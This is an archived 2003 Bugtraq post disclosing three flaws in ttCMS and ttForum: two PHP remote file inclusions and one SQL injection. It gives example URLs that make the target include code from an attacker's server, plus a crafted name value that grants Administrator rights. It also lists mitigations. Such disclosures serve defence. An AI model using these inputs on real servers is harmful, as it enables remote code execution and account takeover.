Home page logo
/

bugtraq logo Bugtraq mailing list archives

ttcms and ttforum exploits
From: Charles Reinold <creinold () hotmail com>
Date: 9 May 2003 16:58:36 -0000



hope this is the right place to send this exploit info, I found three 
diffrent exploits for a forum software / cms software:
--------------------------------------------------------------------------
----------------------------------------------------------------------

Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:
Open up modules/forum/News.php (ttCMS) or News.php (ttForum).
As you can see, this line:
      include($template . '.' . $ext);
Includes a file directly from the user input.

Here's an example exploit URL:
http://www.yourserver.com/ttforum/index.php?
action=news;board=1;template=http://www.yourserver.com/modules/forum/helpa
dmin;ext=help

As you can see, it's possible to execute remote code using this hole.

Possible solutions:
Install YaBB SE 1.5.2.  While ttForum is a derivative of YaBB SE, this 
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole.  (none 
is yet available.)
Use a different forum and/or CMS software.

--------------------------------------------------------------------------
----------------------------------------------------------------------

Affected Product: ttCMS or ttForum
Affected Versions: ttCMS 2.2, (possibly more) all versions of ttForum.

Description of exploit:
Open up modules/forum/src/Profile.php (ttCMS) or src/Profile.php 
(ttForum).
As you can see, this line:
      foreach ($HTTP_POST_VARS as $key => $value) {
    $member[$key] = str_replace(array('&', '"', '<', '>'), array
('&amp;', '&quot;', '&lt;', '&gt;'), trim($value));
Parses out ", <, >, and &.  It, however, does not parse out a SINGLE 
quote.

Now scroll down.
SET $queryPasswdPart $customTitlePart realName='$member[name]', 

As you can see, simply setting your name to "me' 
memberGroup='Administrator" would make you an Administrator on any server 
that had magic_quotes_gpc off.

As you can see from the php.ini-recommended file:
; - magic_quotes_gpc = Off        [Performance]

They recommend it off, and thus a multitude of servers have it off, 
enabling this hole.

Possible solutions:
Install YaBB SE 1.5.2.  While ttForum is a derivative of YaBB SE, this 
hole does not exist there.
Upgrade to a newer version of ttForum/ttCMS that fixes the hole.  (none 
is yet available.)
Use a different forum and/or CMS software.

--------------------------------------------------------------------------
----------------------------------------------------------------------

Title:   ttForum / ttCMS, remote command execution.
Application:   ttForum up to 1.1, ttCMS 2.2Platform(s):   Unix 
Technical description:
----------------------
Everybody can inject PHP code in ttForum/ttCMS through the 
ttForumInstaller. The Installer (which can be found in 
the /modules/forumdirectory in ttCMS) includes the Forum-Settings 
throughinclude("$installdir/Settings.php") where $installdir istaken from 
a Form.In order to exploit this vulnerability, all you have to do is 
tocreate a File "Settings.php" on your own webserver which containsthe 
code you want to execute on the target-system. If you now callthe 
install.php-File with the following parameters:http://target-
system/install.php?step=7&installdir=http://yourserver/the code in 
Settings.php will be injected.

Recommendations:
----------------
Delete install.php AS SOON AS POSSIBLE or use YaBB SE 1.5.2 (ttForumis a 
derivate of YaBB SE)


  By Date           By Thread  

Current thread:
  • ttcms and ttforum exploits Charles Reinold (May 09)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]